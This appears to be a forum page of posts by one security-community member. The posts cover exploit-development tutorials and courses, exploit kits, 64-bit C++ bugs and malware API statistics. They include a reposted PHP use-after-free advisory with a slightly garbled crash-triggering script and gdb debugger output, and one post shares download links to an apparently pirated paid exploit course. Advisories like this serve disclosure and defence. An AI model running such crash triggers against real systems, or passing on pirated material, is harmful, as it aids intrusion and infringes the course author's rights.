  15. Exploit Tutorials - Primal Security Podcast Hello RST : Contents : 0x0 Exploit Tutorial: Buffer Overflow – Vanilla EIP Overwrite 0x1 Exploit Tutorial: XSS 0x2 Exploit Tutorial: Web Hacking with Burp Suite 0x3 Exploit Tutorial: Buffer Overflow – SEH Bypass 0x4 Exploit Tutorial: Social Engineering Toolkit (SET) 0x5 Exploit Tutorial: Porting Your First Exploit to Metasploit 0x6 Exploit Tutorial: msfpayload and Backdooring EXEs 0x7 Exploit Tutorial: Bad Character Analysis 0x8 Exploit Tutorial: The Elusive Egghunter 0x9 Exploit Tutorial: Web Shells Source : http://www.primalsecurity.net/tutorials/exploit-tutorials/ Copyright 2012-2015 Primal Security | All Rights Reserved iF U LoVe PyThOn : Python Tutorials Regards NO-MERCY
  16. A Collection of Examples of 64-bit Errors in Real Programs Example 1. Buffer overflow Example 2. Unnecessary type conversions Example 3. Incorrect #ifdef's Example 4. Confusion of int and int* Example 5. Using deprecated (obsolete) functions Example 6. Truncation of values at an implicit type conversion Example 7. Undefined functions in C Example 8. Remains of dinosaurs in large and old programs Example 9. Virtual functions Example 10. Magic constants as parameters Example 11. Magic constants denoting size Example 12. Stack overflow Example 13. A function with a variable number of arguments and buffer overflow Example 14. A function with a variable number of arguments and wrong format Example 15. Storing integer values in double Example 16. Address arithmetic. A + B != A - (- Example 17. Address arithmetic. Signed and unsigned types. Example 18. Address arithmetic. Overflows. Example 19. Changing an array's type Example 20. Wrapping a pointer in a 32-bit type Example 21. Memsize-types in unions Example 22. An infinity loop Example 23. Bit operations and NOT operation Example 24. Bit operations, offsets Example 25. Bit operations and sign extension Example 26. Serialization and data exchange Example 27. Changes in type alignment Example 28. Type alignments and why you mustn't write sizeof(x) + sizeof(y) Example 29. Overloaded functions Example 30. Errors in 32-bit units working in WoW64 Abstract This article is the most complete collection of examples of 64-bit errors in the C and C++ languages. The article is intended for Windows-application developers who use Visual C++, however, it will be useful for other programmers as well. Introduction Our company OOO "Program Verification Systems" develops a special static analyzer Viva64 that detects 64-bit errors in the code of C/C++ applications. During this development process we constantly enlarge our collection of examples of 64-bit defects, so we decided to gather the most interesting ones in this article. Here you will find examples both taken directly from the code of real applications and composed synthetically relying on real code since such errors are too "extended" throughout the native code. The article only demonstrates various types of 64-bit errors and does not describe methods of detecting and preventing them. If you want to know how to diagnose and fix defects in 64-bit programs, please see the following sources: Lessons on development of 64-bit C/C++ applications [1]; About size_t and ptrdiff_t [2]; 20 issues of porting C++ code on the 64-bit platform [3]; PVS-Studio Tutorial [4]; A 64-bit horse that can count [5]. You may also try the demo version of the PVS-Studio tool that includes the Viva64 static code analyzer which detects almost all the errors described in this article. The demo version of the tool can be downloaded here. Article as PDF By NO-MERCY : File: A Collection of Examples of 64-bit Errors in Real Programs.pdf CRC-32: 83a44d07 MD4: fce9ce801355066291dbb909122303b5 MD5: a4860ed0e570d9b1f18223f57dbef54a SHA-1: ee39016950c6ecc5a09542a40b141f641b036e73 Pages : 40 size : 1.88 MB Download : http://www.4shared.com/office/ZlJBYgdxba/A_Collection_of_Examples_of_64.html Regards Source : http://www.viva64.com/en/a/0065/ 29.06.2010 by : Andrey Karpov
  17. Hello RST : Exploit Development Course 2015 --> Free Preface Hi and welcome to this website! I know people don’t like to read prefaces, so I’ll make it short and right to the point. This is the preface to a course about Modern Windows Exploit Development. I chose Windows because I’m very familiar with it and also because it’s very popular. In particular, I chose Windows 7 SP1 64-bit. Enough with Windows XP: it’s time to move on! There are a few full-fledged courses about Exploit Development but they’re all very expensive. If you can’t afford such courses, you can scour the Internet for papers, articles and some videos. Unfortunately, the information is scattered all around the web and most resources are definitely not for beginners. If you always wanted to learn Exploit Development but either you couldn’t afford it or you had a hard time with it, you’ve come to the right place! This is an introductory course but please don’t expect it to be child’s play. Exploit Development is hard and no one can change this fact, no matter how good he/she is at explaining things. I’ll try very hard to be as clear as possible. If there’s something you don’t understand or if you think I made a mistake, you can leave a brief comment or create a thread in the forum for a longer discussion. I must admit that I’m not an expert. I did a lot of research to write this course and I also learned a lot by writing it. The fact that I’m an old-time reverse engineer helped a lot, though. In this course I won’t just present facts, but I’ll show you how to deduce them by yourself. I’ll try to motivate everything we do. I’ll never tell you to do something without giving you a technical reason for it. In the last part of the course we’ll attack Internet Explorer 10 and 11. My main objective is not just to show you how to attack Internet Explorer, but to show you how a complex attack is first researched and then carried out. Instead of presenting you with facts about Internet Explorer, we’re going to reverse engineer part of Internet Explorer and learn by ourselves how objects are laid out in memory and how we can exploit what we’ve learned. This thoroughness requires that you understand every single step of the process or you’ll get lost in the details. As you’ve probably realized by now, English is not my first language (I’m Italian). This means that reading this course has advantages (learning Exploit Development) and disadvantages (unlearning some of your English). Do you still want to read it? Choose wisely To benefit from this course you need to know and be comfortable with X86 assembly. This is not negotiable! I didn’t even try to include an assembly primer in this course because you can certainly learn it on your own. Internet is full of resources for learning assembly. Also, this course is very hands-on so you should follow along and replicate what I do. I suggest that you create at least two virtual machines with Windows 7 SP1 64-bit: one with Internet Explorer 10 and the other with Internet Explorer 11. I hope you enjoy the ride! Contents WinDbg Mona 2 Structure Exception Handling (SEH) Heap Windows Basics Shellcode Exploitme1 (ret eip overwrite) Exploitme2 (Stack cookies & SEH) Exploitme3 (DEP) Exploitme4 (ASLR) Exploitme5 (Heap Spraying & UAF) EMET 5.2 Internet Explorer 10 Reverse Engineering IE From one-byte-write to full process space read/write God Mode (1) God Mode (2) Use-After-Free bug Internet Explorer 11 Part 1 Part 2 Regards NO-MERCY PDF'S Soooooooon Source : http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/
  18. Thats is not his course this IS Vivek ( Buffer Overflow Exploitation Megaprimer for Linux ) But i found links for Ajin Abraham primer : Windows Exploit Development Megaprimer Offered by Udemy Instructor: Ajin Abraham Cost: $99 Link Course : https://www.udemy.com/windows-exploit-development-megaprimer/ Contents: ---------- 1 Buffer Overflow Explained.mp4 2 Vanilla EIP Overwrite.mp4 3 Exploiting Vanilla EIP Overwrite.mp4 4 Eliminating Bad Character in your Exploit.mp4 5 Exploiting Buffer Overflow StructuredException Handler (SEH) Overwrite.mp4 6 Mona.py - The Exploit Writer's Swiss Army Knife.mp4 7 Mona.py - Continuation.mp4 8 Converting Exploits to Metasploit Modules with mona.py.mp4 9 Unicode Based Exploit Development Introduction.mp4 10 Unicode Based Exploit Development Continuation.mp4 11 Unicode Based Exploit Development Final Thoughts.mp4 12 Egg Hunter Basics.mp4 13 Writing an Exploit using Egg Hunter.mp4 14 Data Execution Prevention (DEP) Basics.mp4 15 Bypassing Data Execution Prevention (DEP) using ROP Chains.mp4 https://mega.co.nz/#!YRYziZAK!PUKLnXBQN5BmqTmw998N23RujCnqvptyB_mgerYVsyo https://mega.co.nz/#!UJhigbja!JdNosvRb29vFkJf2tp4R2dTU7HUZ5HFimK0GKVdCdJg https://mega.co.nz/#!ocQ3XS7D!BPRhCuYrAYSG6DpVBgYKWNnuQQzTpKcLZkhMtFIHJB4 Part 1 310 MB part 2 310 MB part 3 226 MB -------------------------------------------------------- New Links : 23-11-2015 ------------------------ Udemy - Windows Exploit Development Megaprimer Zippyshare.com - Windows Exploit Development Megaprimer.part1.rar --> 200 mb Zippyshare.com - Windows Exploit Development Megaprimer.part2.rar --> 132 mb ----------------------------------------------------- New links : 25-11-2015 ------------------------- NitroFlare - Upload Files http://nitroflare.com/view/BD691B17F5B8AD9/Windows_Exploit_Development_Megaprimer.part2.rar http://nitroflare.com/view/8D2D7F4D697EC8A/Windows_Exploit_Development_Megaprimer.part3.rar Regards NO-MERCY
  19. It was for free and now it's Not Hello rst : while i'm searchin for any update of this free Megaprimer ... I didn't Find it in Youtube anymore author Poped it from yt and Pushed it to UDEMY To make Money From his free traning course (What da F--K) https://www.udemy.com/windows-exploit-development-megaprimer/?dtcode=6oD2dua39IGE forgive me .. i can't uplaod it 1.70 GB But I'll Find Valid Links
  20. Exploit Kits: Past, Present and Future March 16, 2015 View research paper: The Evolution of Exploit Kits Exploit kits are a fast-growing online threat that cybercriminals seem to have favored in the last few years to execute Web-based attacks to distribute malware. Exploit kits are old tools released by Russian programmers dating back to 2006. As seen in the diagram below, exploit kits have continuously grown in numbers from 2006 to 2013. The market seemingly changed and took a significant dip however in 2014. The rise of exploit kits in underground markets push exploit kit developers to improve the stealth and efficiency of their products and services. Currently, there are 70 different exploit kits found in the wild, taking advantage of more than a hundred vulnerabilities. What is an Exploit Kit? Exploit kits are programs or more often scripts that exploit vulnerabilities in programs or applications. The most prevalent exploits are browser exploits that enable the download of malicious files. Exploits introduce code to victims’ computers that then downloads and executes a malicious file. Several kits have since been developed and sold or rented out like commercial products in underground markets. The easiest hack toolkit made available in the crimeware market on record was seen sometime in 2006. A typical exploit kit usually provides a management console, several vulnerabilities targeted to different applications, and several add-on functions that make it easier for a cybercriminal to launch an attack. The Timeline Record of Exploit Kits The following research paper discusses the following: Exploit Kit Attack Scenario – there are four stages that illustrate how a typical attack scenario happens. Detailed below, the stages include contact, redirect, exploit, and finally, infect. Overview of 2014 Exploit Kit Activity – this section discusses the exploit kit trends traced back from 2006 to 2014, including its threat distribution. Exploit Kits are presently one of the most popular types of Web attack toolkits thriving in the cybercriminal underground market, and we predict that exploit kits will be more prevalent in 2015. Internet Explorer, Adobe Flash, and Adobe Reader are the most common software targeted by cybercriminals. Exploit kits pose serious security risks to all computer users ranging from private users to corporate networks. As such, it is critical to know and understand how exploit kits work, where they came from, what are the current trends, and how to defend against them. NO-MERCY Regards Source : Exploit Kits: Past, Present and Future - Security News - Trend Micro USA
  21. Use-After-Free in PHP May 20, 2015 Advisory ID: HTB23262 Product: PHP Vendor: PHP Group Vulnerable Versions: 5.6.9 and probably prior Tested Version: 5.6.9 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Fix: June 2, 2015 Public Disclosure: June 10, 2015 Latest Update: June 9, 2015 Vulnerability Type: Use After Free [CWE-416] CVE Reference: Pending Risk Level: Medium CVSSv2 Base Score: 4.6 Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab Advisory Details: High-Tech Bridge Security Research Lab discovered use-after-free vulnerability in a popular programming language PHP, which can be exploited to cause crash and possibly execute arbitrary code on the target system. The vulnerability resides within the 'spl_heap_object_free_storage()' PHP function when trying to dereference already freed memory. A local attacker can cause segmentation fault or possibly execute arbitrary code on the target system with privileges of webserver. Below is a simple code that will trigger a crash: <?php class SplMinHeap1 extends SplMinHeap { public function compare($a, $ { return -parent::notexist($a, $; } } $h = new SplMinHeap1(); $h->insert(1); $h->insert(6); $h->insert(5); $h->insert(2); ?> Running the following PoC we get: gdb-peda$ r ~/Desktop/heap_uaf.php Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php PHP Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Program received signal SIGSEGV, Segmentation fault. [----------------------------------------------------------------------- ---registers-------------------------------------------------------------------- -------] RAX: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBX: 0x8000000 RCX: 0xcd0458 ("/home/test/De"...) RDX: 0x16f RSI: 0xcd0458 ("/home/test/De"...) RDI: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RSP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RIP: 0x82a96f (<zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10]) R8 : 0x269 R9 : 0x0 R10: 0x7fffffff9b20 --> 0x0 R11: 0x7ffff71102f0 --> 0xfffda6c0fffda3ef R12: 0x4209e0 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf30 --> 0x2 R14: 0x0 R15: 0x0 [-------------------------------------------------------------------------- ---code------------------------------------------------------------------------- ----] 0x82a964 <zval_delref_p+1>: mov rbp,rsp 0x82a967 <zval_delref_p+4>: mov QWORD PTR [rbp-0x8],rdi 0x82a96b <zval_delref_p+8>: mov rax,QWORD PTR [rbp-0x8] => 0x82a96f <zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10] 0x82a972 <zval_delref_p+15>: lea edx,[rax-0x1] 0x82a975 <zval_delref_p+18>: mov rax,QWORD PTR [rbp-0x8] 0x82a979 <zval_delref_p+22>: mov DWORD PTR [rax+0x10],edx 0x82a97c <zval_delref_p+25>: mov rax,QWORD PTR [rbp-0x8] [-------------------------------------------------------------------- --------stack------------------------------------------------------------------- ----------] As seen above when trying to dereference the value from $rax (which has been already freed) PHP crashes. Stopped reason: SIGSEGV 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 411 return --pz->refcount__gc; Running the backtrace command we can see a couple of freed variables: zval_ptr, pz gdb-peda$ bt #0 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 #1 0x000000000082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76 #2 0x000000000082bdcb in _zval_ptr_dtor (zval_ptr=0x7ffff7fcba88, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424 #3 0x00000000006e5c1a in spl_heap_object_free_storage (object=0x7ffff7dfdfa0) at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367 #4 0x000000000087f566 in zend_objects_store_free_object_storage (objects=0x102e640 <executor_globals+928>) at /home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97 #5 0x000000000082b89e in shutdown_executor () at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290 #6 0x0000000000841a4c in zend_deactivate () at /home/test/Desktop/php-5.6.9/Zend/zend.c:960 #7 0x00000000007a7c40 in php_request_shutdown (dummy=0x0) at /home/test/Desktop/php-5.6.9/main/main.c:1882 #8 0x00000000008f6501 in do_cli (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1177 #9 0x00000000008f6d8b in main (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1378 #10 0x00007ffff6faaec5 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #11 0x0000000000420a09 in _start () Lastly, from stack #2 we clearly see that the zval_ptr pointer (0x7ffff7fcba88) points to freed memory: gdb-peda$ x/50xw 0x7ffff7fcba88 0x7ffff7fcba88: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7 ffff7fcba98: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaa8: 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbab8: 0x5a5a5a5a 0x5a5a5a5a 0x5 a5a5a5a 0x5a5a5a5a 0x7ffff7fcbac8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbad8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbae8: 0x 5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaf8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb08: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5 a5a 0x7ffff7fcbb18: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb28 : 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb38: 0x5a5a5a5a 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb48: 0x5a5a5a5a 0x5a5a5a5a This vulnerability was successfully reproduced Ubuntu 14.04.1 LTS (32 bit and 64 bit) on the latest version of PHP 5.6.9. ImmuniWeb® On-Demand Web Application Penetration Test Solution: Apply Vendor's patch. More Information: https://bugs.php.net/bug.php?id=69737 Git - php-src.git/commit References: [1] High-Tech Bridge Advisory HTB23262 - https://www.htbridge.com/advisory/HTB23262 - Use-After-Free in PHP. [2] PHP - PHP: Hypertext Preprocessor - PHP is a popular general-purpose scripting language that is especially suited to web development. [3] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - a PCI compliant web application penetration test combined with managed vulnerability scan. Configure, schedule, and manage online 24/7. Source : https://www.htbridge.com/advisory/HTB23262
  22. Sure ; Every One Can Learn Something Here Whole Google in RST
  23. Top Maliciously Used APIs Today I’m going to be discussing the top APIs imported from a large number of confirmed malware samples. This all started out of a curiosity and a lack of research published surrounding the topic. I’m not 100% sure I reached any concrete conclusions after completing this experiment but here are my results and the conclusions I drew. The Experiment Download the largest collections of malware that I could find (making sure all samples were unique and confirmed on VirusTotal) then proceed to retrieve the imports of all of the PE files. I ended up with 549,035 PE samples with a final uncompressed size of just over 5TB. Once I retrieved all of my samples (thanks to virusshare.com and my own personal collection) I proceeded to write a multi-threaded python script (yes it was terribly slow) that would retrieve all the imports and count the number of times each sample uniquely imported an API. The script then racked and stacked the results to show which APIs were imported the most. The Results There was a final total of 120,126 uniquely imported APIs. A much larger number than I would have predicted. There was a total of 21,043 samples with no imports at all compared to 527,992 samples that did import at least one API. There were a number of interesting findings. I’m attaching a PDF with the all of the imports at the end. Finding #1 The first result that I found interesting was that only 3.8% of the samples had no imports at all. That means that less than 5% of the files were either packed with no imports, statically included their dlls, or were using their own methods for finding and importing APIs outside of the PE import table. This is fairly interesting and not personally what I’ve seen in the wild. Top Ten Imported APIs #1 GetProcAddress 394546 #2 LoadLibraryA 344607 #3 GetModuleHandleA 305054 #4 ExitProcess 301073 #5 VirtualAlloc 244900 #6 WriteFile 223855 #7 GetModuleFileNameA 221006 #8 CloseHandle 220358 #9 RegCloseKey 213748 #10 VirtualFree 211790 Finding #2 The second and most important result was the top ten imported APIs. If you compare the top ten APIs vs. the remaining imported APIs there’s a significant drop off. I expected some APIs such as WinExec to have a much larger import (one of my personal favorite APIs) but it was only imported 31,943 times, this is a significantly smaller number than the number one import. Even from the number one import to the number three import there is a fairly significant difference. What this tells me is that there is a significant number of malicious files that are dynamically loading their own libraries at run time (good potential for being packed), a very interesting result. Attached is a graph showing the large drop off after GetProcAddress and LoadLibraryA (only top 100 imported APIs are graphed). top100apis Finding #3 One of the most interesting results from this experiment was the large number of APIs imported (120,126). I wasn’t expecting this so I began look through some of the imports to look for any common trends that stuck out. What became clear is that a number of APIs were being imported from 3rd party dll’s. For example av_dup_packet was imported from an audio dll (FFmpeg: libavcodec/avpacket.c File Reference). After some discussion with my friend Matt Weeks (scriptjunkie – website linked below), it’s likely that these APIs are being used to break AntiVirus sandboxes (and potentially malware sandboxes like Cuckoo). Further there are a number of imports that are just aliases to Windows APIs such as vlc_memset (alias to memset). These are two interesting techniques that would work great for evading a heuristic or signature based AV product that’s examining imports. To read more about these techniques I included a link in the Resources section at the bottom. Finding #4 There were a large number of Windows SystemFunction APIs imported (undocumented Windows APIs). Specifically there were 38 SystemFunction imports, ranging from being imported 122 times to just 10. While this is not unexpected, I did find some of their imports interesting. I expected the largest number of imports to be from function to help with retrieving passwords or hashes from the system but it doesn’t appear that was the case (at least from my knowledge of the methods used to retrieve passwords or hashes from Windows). The most imported SystemFunction was SystemFunction040 which is an alias for RtlEncryptMemory according to the MSDN. More interestingly, SystemFunction006 was the third most imported SystemFunction, this is used in the current version of Mimikatz (Google if you don’t know what Mimikatz does). There were some remaining imports which struck me as interesting but overall nothing I didn’t expect. For example one file imported an API from the SKIDROW dll. SKIDROW is a notorious cracker group of commercial protection in PC games, I can only imagine what this sample was trying to do. Feel free to draw your own conclusion from these results, I’d love to hear any thoughts on these findings. Findings PDF Attached here are the results of the findings in a PDF. If you’d like the excel file to perform your own analysis on please email me at nullbnx@bnxnet.com. Malware APIs Results PDF Resources Virus Share Paper on AV evasion with APIs MSDN Script Junkie’s Blog Source : https://www.bnxnet.com/top-maliciously-used-apis/
  • Create New...